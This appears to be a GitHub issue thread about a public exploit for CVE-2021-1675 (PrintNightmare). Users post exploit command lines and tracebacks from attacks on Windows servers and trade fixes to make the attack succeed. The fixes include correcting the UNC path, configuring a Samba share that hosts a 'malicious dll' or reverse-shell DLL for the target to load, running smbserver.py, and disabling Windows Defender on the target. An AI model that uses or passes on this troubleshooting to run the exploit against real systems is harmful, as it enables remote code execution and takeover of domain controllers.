CVE-2021-1675
CVE-2021-1675 copied to clipboard
cube0x0
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.
Hello.
I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.
Has anyone had the same problem or know how I can solve it please?
Complete stdout:
"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:[email protected] '\172.16.224.6\smb\fakeprinter.dll'
[] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing \172.16.224.6\smb\fakeprinter.dll
[*] Try 1...
Traceback (most recent call last):
File "./CVE-2021-1675.py", line 176, in
User exist in the AD: "balves"
Target: WS 2019
Thanks
Did you copy the smb.conf in the README exactly? i.e. did you include this line:
force user = smbuser
If so, remove that line or change smbuser to a valid username on your attacking machine.
Thanks for your help, @rewks .
I tried all combinations of users:
- force user = smbuser
- force user = administrator (with and without domain)
- force user = balves (with and without domain)
Nothing works.
If I remove the line, another error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."
Hello, @korang .
Thanks. But if i do any changes in "force user =", this new error appears: "impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified."
I don't have any more ideas of what can be =(
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.
@cube0x0
@braieralves you disabled "windows defend" on the server, was that it?
I have this same error!
I tried the options but with no success!
Any idea?
Hello @wtechsec .
Disable Windows Defender: https://jv16powertools.com/how-to-disable-windows-defender-windows-10/
Then, i created an AD user called "smbuser"(as in the /etc/samba/smb.conf).
After this, the exploit worked
Hey @braieralves ,
I am having the same problem as you. Could you help me?
┌──(root💀kali)-[~/CVE-2021-1675]
└─# python3 CVE-2021-1675.py se130034/Administrator:Admin@[email protected] '\\192.168.40.155>\smb\rev.dll'
[*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL
[*] Executing \\192.168.40.155>\smb\rev.dll
[*] Try 1...
Traceback (most recent call last):
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
Hey @mrh3r000
Review this item: \192.168.40.155>\smb\rev.dll - Correct form: \192.168.40.155\smb\rev.dll
I did it again from where and got the same error as the picture T_T. Could you help me ?
Still having the problem....
┌──(root💀kali)-[/tmp/CVE-2021-1675]
└─# python3 CVE-2021-1675.py smbuser:[email protected] '\10.1.1.37\smb\reverse.dll'
[] Connecting to ncacn_np:10.1.1.111[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[] Executing ??\UNC\10.1.1.37\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/tmp/CVE-2021-1675/CVE-2021-1675.py", line 188, in
Hey @braieralves , I am having the same problem as you. Could you help me?
┌──(root💀kali)-[~/CVE-2021-1675] └─# python3 CVE-2021-1675.py se130034/Administrator:Admin@[email protected] '\\192.168.40.155>\smb\rev.dll' [*] Connecting to ncacn_np:192.168.40.195[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_64a5c2d136933c8f\Amd64\UNIDRV.DLL [*] Executing \\192.168.40.155>\smb\rev.dll [*] Try 1... Traceback (most recent call last): File "/root/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module> main(dce, pDriverPath, options.share) File "/root/CVE-2021-1675/CVE-2021-1675.py", line 84, in main resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx return dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request raise exception impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.
hi @mrh3r000 did you run smbserver? if not get smbserver.py from github and run as follows smbserver.py smb /tmp ps tmp is path to your file
Well, I had the same problem and I solved it, but I don't know if it can help you. When the PoC is executed, the victim machine tries to look for a shared resource through smb, before I tried with smbserver.py from impacket, but it didn't work, instead I activated the smb service with sudo systemctl start smb, which looks for the configuration file /etc/samba/smb.conf sharing my /tmp/share folder. I created the malicious dll in /tmp/share. My /etc/samba/smb.conf file looks like this:
[smb]
comment = Samba
path = /tmp/share
guest ok = yes
read only = yes
browsable = yes
force user = nobody
Hello everyone. I'm sorry for delay in answers. Let me analyze your questions and see if I can help, ok?
I'll see in the next weekend, ok?
Regards.